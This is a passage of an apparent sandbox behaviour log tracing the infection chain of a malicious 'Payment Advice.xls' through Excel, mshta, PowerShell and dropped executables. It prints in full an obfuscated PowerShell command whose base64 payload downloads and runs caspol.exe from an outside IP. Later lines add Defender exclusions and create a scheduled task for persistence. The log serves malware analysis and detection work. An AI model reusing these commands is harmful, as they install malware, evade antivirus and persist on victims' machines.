                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s....................$.........%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X.......$..........................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X.......7..........................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X.......C..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.........%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X.......a..........................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..................... .......v..........................s....................l.........%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..................... ..................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..................... ..................................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..................... ..................................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@.......&..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@.......4..........................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@.......F..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@.......R..........................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@.......d..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@.......p..........................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............8.......@..................................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@..................................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.@..................................s..............k..... .......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@..................................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@..................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@..................................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s..............k.....$.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@..................................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@..................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@..................................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s..............k.....2.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......@..................................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......8.......B..........................s....................l.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......8.......N..........................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............8.......8.......`..........................s..............k.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......8.......l..........................s..............k.............................
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................<.+.........E.R.R.O.R.:. ...t.......@.......@.........................................................................+.....
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................<.+.........E.R.R.O.(.P.....t.......@.......@.......................................................j.......x.........+.....
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Payment Advice.xlsReversingLabs: Detection: 21%
                    Source: Payment Advice.xlsVirustotal: Detection: 25%
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37A5.tmp" "c:\Users\user\AppData\Local\Temp\i4ik0bio\CSCA15BDDDB4364D65A645793B6780D1C5.TMP"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                    Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {819EB824-4817-4048-BBF5-A7A0A0C35676} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpDCB9.tmp"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'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'+[cHaR]0X22+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0AA.tmp" "c:\Users\user\AppData\Local\Temp\zpwvvpvf\CSC31AA5FCDA54445E088EDA110AE3BEBC4.TMP"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp1F44.tmp"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'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'+[cHaR]0X22+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37A5.tmp" "c:\Users\user\AppData\Local\Temp\i4ik0bio\CSCA15BDDDB4364D65A645793B6780D1C5.TMP"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process created: unknown unknown
                    Source: C:\Windows\System32\taskeng.exe | Process created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpDCB9.tmp"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Process created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'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'+[cHaR]0X22+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0AA.tmp" "c:\Users\user\AppData\Local\Temp\zpwvvpvf\CSC31AA5FCDA54445E088EDA110AE3BEBC4.TMP"
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp1F44.tmp"
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Process created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Windows\System32\mshta.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dwmapi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: webio.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: nlaapi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: oleacc.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: sxs.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: credssp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: bcrypt.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: mpr.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: scrrun.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: d2d1.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dwrite.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: d3d10warp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: msls31.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
